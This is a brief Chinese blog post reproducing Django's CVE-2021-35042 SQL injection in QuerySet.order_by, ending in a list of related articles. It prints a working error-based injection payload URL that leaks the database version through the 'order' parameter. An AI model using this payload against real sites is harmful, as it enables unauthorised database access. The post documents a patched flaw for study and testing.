漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
Mr.朱鹏8 小时前
SQL深度分页问题案例实战ccino .9 小时前
sql注入中过滤分隔符的测试方法Hello.Reader10 小时前
Flink SQL CREATE 语句从建表到 CTAS/RTAS,一次讲清jcsx12 小时前
如何将django项目发布为https百锦再12 小时前
京东云鼎入驻方案解读——通往协同的“高架桥”与“快速路”2501_9167665413 小时前
JDBC以及工具类介绍她说..14 小时前
Spring AOP场景4——事务管理(源码分析)男孩李14 小时前
linux下执行pg数据的sql文件,报错error:permission denied for schema plat小阿宁的猫猫14 小时前
sqlmap的使用jzlhll12315 小时前
关系型数据库Sqlite常用知识点和androidROOM